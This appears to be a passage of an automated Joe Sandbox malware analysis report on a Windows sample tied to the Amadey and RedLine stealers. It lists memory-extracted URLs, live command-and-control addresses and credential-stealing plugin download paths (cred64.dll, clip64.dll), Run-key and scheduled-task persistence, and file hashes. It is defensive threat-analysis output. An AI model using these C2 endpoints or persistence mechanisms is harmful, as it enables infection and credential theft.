                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader56C7.tmp.ctx.exe, 00000010.00000003.1541380109.0000026ABBDA6000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1550156579.0000026ABBDA7000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD8B000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1541214933.0000026ABBD70000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD75000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1540992398.0000026ABBD4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://login.microsoftonline.coexplorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA16148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.datacontract.org/2004/07/System.ServiceModel6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id24Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id21ResponseD6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002C09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://185.81.68.148/8Fvu5jh4DbS/index.phpndowsGxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: phishing
                                                                                                                unknown
                                                                                                                http://185.81.68.148/Fvu5jh4DbS/index.phprundll32.exe, 00000021.00000002.3797376340.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000022.00000002.3798980117.00000000031BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: phishing
                                                                                                                unknown
                                                                                                                https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-ifexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: phishing
                                                                                                                    unknown
                                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://185.81.68.147/7vhfjke3/Plugins/clip64.dllGxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id5Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id15ResponseD6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id10Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renew6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id8Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://185.81.68.148/8Fvu5jh4DbS/index.php(Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: phishing
                                                                                                                                    unknown
                                                                                                                                    https://passwordreset.microsexplorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2006/02/addressingidentity6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://account.activedirectory.explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://185.81.68.148/JGxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                                unknown
                                                                                                                                                http://schemas.microexplorer.exe, 00000005.00000000.1330798923.0000000007320000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3809341876.00000000027F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1331422714.0000000007F70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://tempuri.org/:hardwares.6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://tempuri.org/D6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingex6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl056C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513867334.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512658060.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512879245.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1528803762.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1532153483.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513327898.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1530758520.000001B34401F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15106148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://185.81.68.147/7vhfjke3/index.phpHo5Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                      unknown
                                                                                                                                                                      https://account.liexplorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://tempuri.org/Entity/Id13Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://tempuri.org/Entity/Id12ResponseD6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA16148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA16148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                        185.81.68.147
                                                                                                                                                                                        unknownFinland
                                                                                                                                                                                        50108KLNOPT-ASFItrue
                                                                                                                                                                                        185.81.68.148
                                                                                                                                                                                        unknownFinland
                                                                                                                                                                                        50108KLNOPT-ASFItrue
                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                        Analysis ID:1574303
                                                                                                                                                                                        Start date and time:2024-12-13 08:17:40 +01:00
                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                        Overall analysis duration:0h 14m 9s
                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                        Report type:full
                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                        Number of analysed new started processes analysed:41
                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                        Technologies:
                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                        Sample name:mggoBrtk9t.exe
                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                        Original Sample Name:dd1e3f38ae7711d270748012af613950.exe
                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@59/84@0/2
                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                        • Successful, ratio: 68%
                                                                                                                                                                                        • Number of executed functions: 139
                                                                                                                                                                                        • Number of non-executed functions: 278
                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                        • Override analysis time to 240s for rundll32
                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                        • VT rate limit hit for: mggoBrtk9t.exe
                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                        02:18:39API Interceptor12530x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                        02:18:39API Interceptor12254x Sleep call for process: audiodg.exe modified
                                                                                                                                                                                        02:18:39API Interceptor232903x Sleep call for process: explorer.exe modified
                                                                                                                                                                                        02:19:21API Interceptor15x Sleep call for process: 6148.tmp.ssg.exe modified
                                                                                                                                                                                        02:20:01API Interceptor3872x Sleep call for process: Gxtuum.exe modified
                                                                                                                                                                                        02:20:22API Interceptor51x Sleep call for process: powershell.exe modified
                                                                                                                                                                                        02:20:51API Interceptor7963x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                        08:18:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe
                                                                                                                                                                                        08:18:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe
                                                                                                                                                                                        08:19:06Task SchedulerRun new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        185.81.68.147D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                        hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php?wal=1
                                                                                                                                                                                        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                        • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                        • 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
                                                                                                                                                                                        185.81.68.148D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148/8Fvu5jh4DbS/index.php
                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148/8Fvu5jh4DbS/index.php
                                                                                                                                                                                        hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
                                                                                                                                                                                        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148/8Fvu5jh4DbS/index.php
                                                                                                                                                                                        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                        • 185.81.68.148/8Fvu5jh4DbS/index.php
                                                                                                                                                                                        No context
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        KLNOPT-ASFID72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                        KLNOPT-ASFID72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                        No context
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\cred64[1].dlltOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                          yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dlltOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                              yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3293
                                                                                                                                                                                                Entropy (8bit):5.3364558769830905
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc5q3Z5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                MD5:E60C20F769DA5AF3C23391053EE42897
                                                                                                                                                                                                SHA1:5593616A4D17499C9628179A8108F31819A7FD7A
                                                                                                                                                                                                SHA-256:BBFB2FAFC866E2546F5A75860AE7C6B5AE0537630A90440FADB29305DD25608F
                                                                                                                                                                                                SHA-512:02E9AE3BB339318C5AD26C453B02E57878D7D83F6BE584E718308A29C937DCE0ACA011A857342893CA52A51312E700B6119F2C6F4FAA7321584339CEE7173137
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                Entropy (8bit):5.202351927401395
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:YqHZ6T06MhmQvmmb0O0bihmIqvmm6CUXyhmfJgvmmbxdB6hmxvmmz0JahmsvmmbE:YqHZ6T06McFmb0O0bicIjmDUXycR1mb2
                                                                                                                                                                                                MD5:3339D6EDF001A2971486F3EAF39F0476
                                                                                                                                                                                                SHA1:1F7E104E89EC728EDF3488EB66B5E97F2B32708F
                                                                                                                                                                                                SHA-256:547E26B6B9B96A8F2C813F8C37DD731CC8D4CF0FEA5A6006DD1E302DCC4EFB19
                                                                                                                                                                                                SHA-512:458178CF74A9DB8817940EA9DAF336A8D783D8D5165CFD46F3E01D96BBD55E226F9C13B041CF5515DB0343848E78981E76D4BD4154B79275EEF4E2A1A29F71BC
                                                                                                                                                                                                Malicious:false
